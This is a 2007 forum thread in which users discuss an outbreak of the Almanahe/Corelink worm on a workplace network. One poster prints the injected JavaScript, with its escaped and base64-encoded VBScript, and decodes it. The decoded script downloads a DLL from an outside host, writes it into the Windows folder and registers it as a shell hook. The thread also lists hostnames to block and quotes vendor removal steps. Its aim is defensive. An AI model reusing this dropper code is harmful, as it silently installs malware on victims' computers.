Network Disconnection problems? might be NASTY VIRUS!

Darren Dirt · June 05, 2007, 11:01:04 AM

W32/Almanahe.c
http://vil.nai.com/vil/content/v_142394.htm

also see:
W32/Almanahe.a
http://vil.nai.com/vil/content/v_142021.htm

and W32/Almanahe.b is apparently out too

- - -

in a nutshell dammit I am pissed. I got a new machine here at work a few months ago, it's WinXP, and looks like this bugger spreads through network shares or something, especially on XP.

I run Windoze Update a lot, but apparently it's like a very very recent evil creature.

Every few hours I would have to disable-reenable my network connection, then all would be fine. Today it got to almost every 5 minutes.

I am not joking.

So if you're experiencing similar, then good luck. Looks like the antivirus programs are only TODAY finally mentioning it on their sites (I had searched for "sb941.com" even yesterday, no hits until today).

BTW the sign of infection: if you do a view-source in your browser (IE or Firefox both) you'll notice in the first line the following:

<script src="http://sb.sb941.com/k.js" type="text/javascript"></script>

or

<script src="http://k.sb941.com/k.js" type="text/javascript"></script>

When I realized this, I of course checked out the .JS file. NASTY.

Technical vomitage follows.

Code Select


function Get(){
var Then = new Date() 
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1=" 
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){ 
} else 
{ document.cookie = "Cookie1=sunun;expires="+ Then.toGMTString();
document.write(unescape("%3Cscript%20language%3D%22vbscript%22%3E%0D%0AFunction%20LeoFunc%28ByVal%20encodeString%29%0D%0AConst%20Templete%20%3D%20%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/%22%20%0D%0ADim%20dataLength%2C%20sOut%2C%20groupBegin%0D%0AencodeString%20%3D%20Replace%28encodeString%2C%20vbCrLf%2C%20%22%22%29%0D%0AencodeString%20%3D%20Replace%28encodeString%2C%20vbTab%2C%20%22%22%29%0D%0AencodeString%20%3D%20Replace%28encodeString%2C%20%22%20%22%2C%20%22%22%29%0D%0AdataLength%20%3D%20Len%28encodeString%29%0D%0AIf%20dataLength%20Mod%204%20%3C%3E%200%20Then%0D%0AExit%20Function%0D%0AEnd%20If%0D%0AFor%20groupBegin%20%3D%201%20To%20dataLength%20Step%204%0D%0ADim%20numDataBytes%2C%20CharCounter%2C%20thisChar%2C%20thisData%2C%20nGroup%2C%20pOut%0D%0AnumDataBytes%20%3D%203%0D%0AnGroup%20%3D%200%0D%0AFor%20CharCounter%20%3D%200%20To%203%0D%0AthisChar%20%3D%20Mid%28encodeString%2C%20groupBegin%20+%20CharCounter%2C%201%29%0D%0AIf%20thisChar%20%3D%20%22%3D%22%20Then%0D%0AnumDataBytes%20%3D%20numDataBytes%20-%201%0D%0AthisData%20%3D%200%0D%0AElse%0D%0AthisData%20%3D%20InStr%281%2C%20Templete%2C%20thisChar%2C%20vbBinaryCompare%29%20-%201%0D%0AEnd%20If%0D%0AIf%20thisData%20%3D%20-1%20Then%0D%0AExit%20Function%0D%0AEnd%20If%0D%0AnGroup%20%3D%2064%20*%20nGroup%20+%20thisData%0D%0ANext%0D%0AnGroup%20%3D%20Hex%28nGroup%29%0D%0AnGroup%20%3D%20String%286%20-%20Len%28nGroup%29%2C%20%220%22%29%20%26%20nGroup%0D%0ApOut%20%3D%20Chr%28CByte%28%22%26H%22%20%26%20Mid%28nGroup%2C%201%2C%202%29%29%29%20+%20Chr%28CByte%28%22%26H%22%20%26%20Mid%28nGroup%2C%203%2C%202%29%29%29%20+%20Chr%28CByte%28%22%26H%22%20%26%20Mid%28nGroup%2C%205%2C%202%29%29%29%0D%0AsOut%20%3D%20sOut%20%26%20Left%28pOut%2C%20numDataBytes%29%0D%0ANext%0D%0ALeoFunc%20%3D%20sOut%0D%0AEnd%20Function%0D%0AExecute%20LeoFunc%28%22RnVuY3Rpb24gTGVvRnVuYyhCeVZhbCBlbmNvZGVTdHJpbmcpDQpDb25zdCBUZW1wbGV0ZSA9ICJBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvIiANCkRpbSBkYXRhTGVuZ3RoLCBzT3V0LCBncm91cEJlZ2luDQplbmNvZGVTdHJpbmcgPSBSZXBsYWNlKGVuY29kZVN0cmluZywgdmJDckxmLCAiIikNCmVuY29kZVN0cmluZyA9IFJlcGxhY2UoZW5jb2RlU3RyaW5nLCB2YlRhYiwgIiIpDQplbmNvZGVTdHJpbmcgPSBSZXBsYWNlKGVuY29kZVN0cmluZywgIiAiLCAiIikNCmRhdGFMZW5ndGggPSBMZW4oZW5jb2RlU3RyaW5nKQ0KSWYgZGF0YUxlbmd0aCBNb2QgNCA8PiAwIFRoZW4NCkV4aXQgRnVuY3Rpb24NCkVuZCBJZg0KRm9yIGdyb3VwQmVnaW4gPSAxIFRvIGRhdGFMZW5ndGggU3RlcCA0DQpEaW0gbnVtRGF0YUJ5dGVzLCBDaGFyQ291bnRlciwgdGhpc0NoYXIsIHRoaXNEYXRhLCBuR3JvdXAsIHBPdXQNCm51bURhdGFCeXRlcyA9IDMNCm5Hcm91cCA9IDANCkZvciBDaGFyQ291bnRlciA9IDAgVG8gMw0KdGhpc0NoYXIgPSBNaWQoZW5jb2RlU3RyaW5nLCBncm91cEJlZ2luICsgQ2hhckNvdW50ZXIsIDEpDQpJZiB0aGlzQ2hhciA9ICI9IiBUaGVuDQpudW1EYXRhQnl0ZXMgPSBudW1EYXRhQnl0ZXMgLSAxDQp0aGlzRGF0YSA9IDANCkVsc2UNCnRoaXNEYXRhID0gSW5TdHIoMSwgVGVtcGxldGUsIHRoaXNDaGFyLCB2YkJpbmFyeUNvbXBhcmUpIC0gMQ0KRW5kIElmDQpJZiB0aGlzRGF0YSA9IC0xIFRoZW4NCkV4aXQgRnVuY3Rpb24NCkVuZCBJZg0Kbkdyb3VwID0gNjQgKiBuR3JvdXAgKyB0aGlzRGF0YQ0KTmV4dA0Kbkdyb3VwID0gSGV4KG5Hcm91cCkNCm5Hcm91cCA9IFN0cmluZyg2IC0gTGVuKG5Hcm91cCksICIwIikgJiBuR3JvdXANCnBPdXQgPSBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDEsIDIpKSkgKyBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDMsIDIpKSkgKyBDaHIoQ0J5dGUoIiZIIiAmIE1pZChuR3JvdXAsIDUsIDIpKSkNCnNPdXQgPSBzT3V0ICYgTGVmdChwT3V0LCBudW1EYXRhQnl0ZXMpDQpOZXh0DQpMZW9GdW5jID0gc091dA0KRW5kIEZ1bmN0aW9uDQpPbiBFcnJvciBSZXN1bWUgTmV4dA0KU2V0IG9iaiA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoTGVvRnVuYygiYjJKcVpXTjAiKSkNCm9iai5zZXRBdHRyaWJ1dGUgTGVvRnVuYygiWTJ4aGMzTnBaQT09IiksIExlb0Z1bmMoIlkyeHphV1E2UWtRNU5rTTFOVFl0TmpWQk15MHhNVVF3TFRrNE0wRXRNREJETURSR1F6STVSVE0yIikNCnNldCBvYmpEPW9iai5DcmVhdGVPYmplY3QoTGVvRnVuYygiVFdsamNtOXpiMlowTGxoTlRFaFVWRkE9IiksIiIpDQp1cmxQYXRoTmFtZT1MZW9GdW5jKCJhSFIwY0RvdkwyUmhlUzQ1TVhSbkxtNWxkQzk0Y0M1a2JHdz0iKQ0Kb2JqRC5PcGVuIExlb0Z1bmMoIlIwVlUiKSx1cmxQYXRoTmFtZSxGYWxzZQ0Kb2JqRC5TZW5kDQpzZXQgb2JqQj1vYmouQ3JlYXRlT2JqZWN0KExlb0Z1bmMoIlUyTnlhWEIwYVc1bkxrWnBiR1ZUZVhOMFpXMVBZbXBsWTNRPSIpLCIiKQ0Kc2V0IHNoZWxsPW9iakIuR2V0U3BlY2lhbEZvbGRlcigwKQ0Kc2hlbGxOYW1lPSBvYmpCLkJ1aWxkUGF0aChzaGVsbCxMZW9GdW5jKCJWMmx1YUdWc2NDNWtiR3c9IikpDQpzZXQgb2JqU3RyZWFtPW9iai5DcmVhdGVPYmplY3QoTGVvRnVuYygiUVdSdlpHSXVVM1J5WldGdCIpLCIiKQ0KV2l0aCBvYmpTdHJlYW0NCi5UeXBlPTENCi5PcGVuDQouV3JpdGUgb2JqRC5yZXNwb25zZUJvZHkNCi5TYXZlVG9GaWxlIHNoZWxsTmFtZSwyDQouQ2xvc2UNCkVuZCBXaXRoDQpTZXQgb2JqUiA9IG9iai5DcmVhdGVPYmplY3QoTGVvRnVuYygiVjFOamNtbHdkQzVUYUdWc2JBPT0iKSwiIikNCmtleU5hbWU9TGVvRnVuYygiU0V0TVRWeFRUMFpVVjBGU1JWeERiR0Z6YzJWelhFTk1VMGxFWEhzMlFqTkdRMFJET0MxRk5VTTNMVFEzTjJFdE9ERTNSUzAzTWpnMk5VRTNOelU0UVVWOVhBPT0iKQ0Kb2JqUi5SZWdXcml0ZSBrZXlOYW1lLExlb0Z1bmMoIlYyVmlJRWh2YjJ0eiIpDQprZXlOYW1lPWtleU5hbWUgJiBMZW9GdW5jKCJTVzV3Y205alUyVnlkbVZ5TXpKYyIpDQprZXlOYW1lRXg9TGVvRnVuYygiU0V0TVRWeFRUMFpVVjBGU1JWeE5hV055YjNOdlpuUmNWMmx1Wkc5M2MxeERkWEp5Wlc1MFZtVnljMmx2Ymx4RmVIQnNiM0psY2x4VGFHVnNiRVY0WldOMWRHVkliMjlyYzF4N05rSXpSa05FUXpndFJUVkROeTAwTnpkaExUZ3hOMFV0TnpJNE5qVkJOemMxT0VGRmZRPT0iKQ0Kb2JqUi5SZWdXcml0ZSBrZXlOYW1lLHNoZWxsTmFtZQ0Kb2JqUi5SZWdXcml0ZSBrZXlOYW1lICYgTGVvRnVuYygiVkdoeVpXRmthVzVuVFc5a1pXdz0iKSxMZW9GdW5jKCJRWEJoY25SdFpXNTAiKQ0Kb2JqUi5SZWdXcml0ZSBrZXlOYW1lRXgsIiINCg%3D%3D%22%29%0D%0A%0D%0A%3C/script%3E%0D%0A"));
 }
}Get();

I checked out what it is trying to "Execute" and looks like it does some home-phoning etc.

Function LeoFunc(ByVal encodeString) Const Templete = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin encodeString = Replace(encodeString, vbCrLf, "") encodeString = Replace(encodeString, vbTab, "") encodeString = Replace(encodeString, " ", "") dataLength = Len(encodeString) If dataLength Mod 4 <> 0 Then Exit Function End If For groupBegin = 1 To dataLength Step 4 Dim numDataBytes, CharCounter, thisChar, thisData, nGroup, pOut numDataBytes = 3 nGroup = 0 For CharCounter = 0 To 3 thisChar = Mid(encodeString, groupBegin + CharCounter, 1) If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Templete, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Exit Function End If nGroup = 64 * nGroup + thisData Next nGroup = Hex(nGroup) nGroup = String(6 - Len(nGroup), "0") & nGroup pOut = Chr(CByte("&H" & Mid(nGroup, 1, 2))) + Chr(CByte("&H" & Mid(nGroup, 3, 2))) + Chr(CByte("&H" & Mid(nGroup, 5, 2))) sOut = sOut & Left(pOut, numDataBytes) Next LeoFunc = sOut End Function On Error Resume Next Set obj = document.createElement(LeoFunc("b2JqZWN0")) obj.setAttribute LeoFunc("Y2xhc3NpZA=="), LeoFunc("Y2xzaWQ6QkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0EtMDBDMDRGQzI5RTM2") set objD=obj.CreateObject(LeoFunc("TWljcm9zb2Z0LlhNTEhUVFA="),"") urlPathName=LeoFunc("aHR0cDovL2RheS45MXRnLm5ldC94cC5kbGw=") objD.Open LeoFunc("R0VU"),urlPathName,False objD.Send set objB=obj.CreateObject(LeoFunc("U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q="),"") set shell=objB.GetSpecialFolder(0) shellName= objB.BuildPath(shell,LeoFunc("V2luaGVscC5kbGw=")) set objStream=obj.CreateObject(LeoFunc("QWRvZGIuU3RyZWFt"),"") With objStream .Type=1 .Open .Write objD.responseBody .SaveToFile shellName,2 .Close End With Set objR = obj.CreateObject(LeoFunc("V1NjcmlwdC5TaGVsbA=="),"") keyName=LeoFunc("SEtMTVxTT0ZUV0FSRVxDbGFzc2VzXENMU0lEXHs2QjNGQ0RDOC1FNUM3LTQ3N2EtODE3RS03Mjg2NUE3NzU4QUV9XA==") objR.RegWrite keyName,LeoFunc("V2ViIEhvb2tz") keyName=keyName & LeoFunc("SW5wcm9jU2VydmVyMzJc") keyNameEx=LeoFunc("SEtMTVxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxTaGVsbEV4ZWN1dGVIb29rc1x7NkIzRkNEQzgtRTVDNy00NzdhLTgxN0UtNzI4NjVBNzc1OEFFfQ==") objR.RegWrite keyName,shellName objR.RegWrite keyName & LeoFunc("VGhyZWFkaW5nTW9kZWw="),LeoFunc("QXBhcnRtZW50") objR.RegWrite keyNameEx,""

here are the encoded values it uses...

b2JqZWN0            object
Y2xhc3NpZA==            classid
Y2xzaWQ6QkQ5NkM1NTYtNjVBMy0xMUQwLTk4M0EtMDBDMDRGQzI5RTM2
   clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
TWljcm9zb2Z0LlhNTEhUVFA=      Microsoft.XMLHTTP
aHR0cDovL2RheS45MXRnLm5ldC94cC5kbGw=   http://day.91tg.net/xp.dll
R0VU               GET
U2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q=   Scripting.FileSystemObject
V2luaGVscC5kbGw=         Winhelp.dll
QWRvZGIuU3RyZWFt         Adodb.Stream
V1NjcmlwdC5TaGVsbA==         WScript.Shell
SEtMTVxTT0ZUV0FSRVxDbGFzc2VzXENMU0lEXHs2QjNGQ0RDOC1FNUM3LTQ3N2EtODE3RS03Mjg2NUE3NzU4QUV9XA==
      HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
V2ViIEhvb2tz            HKLM\SOFTWARE\Classes\CLSID\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}\
SW5wcm9jU2VydmVyMzJc         InprocServer32\
SEtMTVxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxTaGVsbEV4ZWN1dGVIb29rc1x7NkIzRkNEQzgtRTVDNy00NzdhLTgxN0UtNzI4NjVBNzc1OEFFfQ==
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{6B3FCDC8-E5C7-477a-817E-72865A7758AE}
VGhyZWFkaW5nTW9kZWw=         ThreadingModel
QXBhcnRtZW50            Apartment

Darren Dirt · June 05, 2007, 01:42:43 PM

yay, our antivirus (Trend Micro) finally has updated their website: they call it "PE_CORELINK.C" instead of Almanahe.c :p

Darren Dirt · June 05, 2007, 02:14:31 PM

btw if any of your guys' "shops" have a major network lag due to infection, here are a bunch of host names which you might want to have blocked to reduce the traffic.

Almanahe ".c" variant (the "June 3rd" discovery, although experienced painfully by Darren a few days earlier dammit) official McAfee site mentions these...

kr.sb941.com
k.sb941.com
info.sb941.com
down.91tg.net

a couple of others that I had found via my own decrypting of the .JS code:

sb.sb941.com
day.91tg.net

also the Almanahe ".a" variant:
pic.imrw0rldwide.com
soft.imrw0rldwide.com
tj.imrw0rldwide.com

Thorin · June 05, 2007, 04:30:43 PM

Quote from: Darren Dirt on June 05, 2007, 11:01:04 AM
W32/Almanahe.c
http://vil.nai.com/vil/content/v_142394.htm

I got a new machine here at work a few months ago, it's WinXP, and looks like this bugger spreads through network shares or something, especially on XP.

Looks nasty, alright. However, they don't really explain how it spreads

Quote
"It's a polymorphic parasitic worm that infects Win32 executable files (*.exe)"

That doesn't really tell me how it gets activated to begin with. Does it come in as an attachment on an email? Does it search for and find open ports on networks and then executes itself? That would be useful information for those that are looking to avoid it...

Darren Dirt · June 05, 2007, 05:36:39 PM

network shares.

Quote
[04:55:05 PM Today -- This message has been bcc'd to all staff]

What has Happened
It has been identified that the problems we are currently experiencing with the ITS Infrastructure have been caused by a Trojan Virus outbreak.

What does this mean to you?
ITS continues to work on resolving these virus issues but the AF network has now been stabilized.

What we are doing to correct this.
The websites that were propagating the virus have been blocked, which contributed to the stabilization of our Network.
We are working with the Anti-Virus vendor to create a new signature file to solve this virus issue. We will keep you updated.

Yes, that's right, end of day and still not "resolved"

Thorin · June 05, 2007, 08:46:23 PM

Yes, once running it searches for executables to infect on the local machine and on all network shares the local machine has access to. What I was asking is do we know how it starts running? Does it come as an email attachment that needs to be opened for it to run? Is it a malicious website that you have to visit for it to run? Is it able to send remote procedure calls to your computer through a hitherto-unknown open port to accept and run itself?

Darren Dirt · June 06, 2007, 08:44:33 AM

I am presuming it's something along the lines of the latter, since I never opened any attachment or questionable executable in the last few weeks, yet I was infected with my XP at work (not at home though, thankfully -- hooray for decent firewall settings).

I'm guessing it's a hole in XP that has not been patched yet by MS and has been known in the hacker community for only a few weeks.

Mr. Analog · June 06, 2007, 08:59:02 AM

Sounds nasty buddy.

mgonce · June 10, 2007, 03:51:30 AM

Trend micro identifies it as <a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE%5FCORELINK%2EA&VSect=P" target="_blank">
PE_CORELINK.A-O</a>
here's the manual removal instructions:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=PE_CORELINK.A-O&VSect=Sn

Removing Autostart Key from the Registry

Removing autostart key from the registry prevents the automatic exection of the malware for which the said key was created.

If the registry key below is not found, the malware may not have executed as of detection. If so, proceed to the succeeding solution set.

Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
In the left panel, double-click the following:
HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet
Still in the left panel, locate and delete the key:
RioDrvs
Close Registry Editor.
Deleting the Malware File(s)

Right-click Start then click Search... or Find..., depending on the version of Windows you are running.
In the Named input box, type the name(s) of the file(s) detected earlier.
In the Look In drop-down list, select My Computer, then press Enter.
Once located, select the file then press SHIFT+DELETE.

Good luck

Darren Dirt · June 10, 2007, 08:51:02 AM

QUICK HEADS-UP WARNING: for some reason FIREFOX freezes up when trying to view this thread (!?) but IE seems okay with it... Not sure if it's something to do with the content, or The Computer Gods are trying to be ironic... (But it finally opens after about 30 seconds :p )

PS: all the major anti-virus programs seem to have their DAT files updated and nicely clean infected machines. Presuming your organization's staff actually keep things up to date

So prolly no need to go into the registry yourself (since there's multiple keys that might have to be removed...)

Lazybones · June 10, 2007, 01:56:08 PM

I have no trouble opening this thread with FF. Try disabling some extensions and trying again.

Mr. Analog · June 10, 2007, 07:16:16 PM

I have no trouble with this thread either. Also, welcome to the madness mgonce...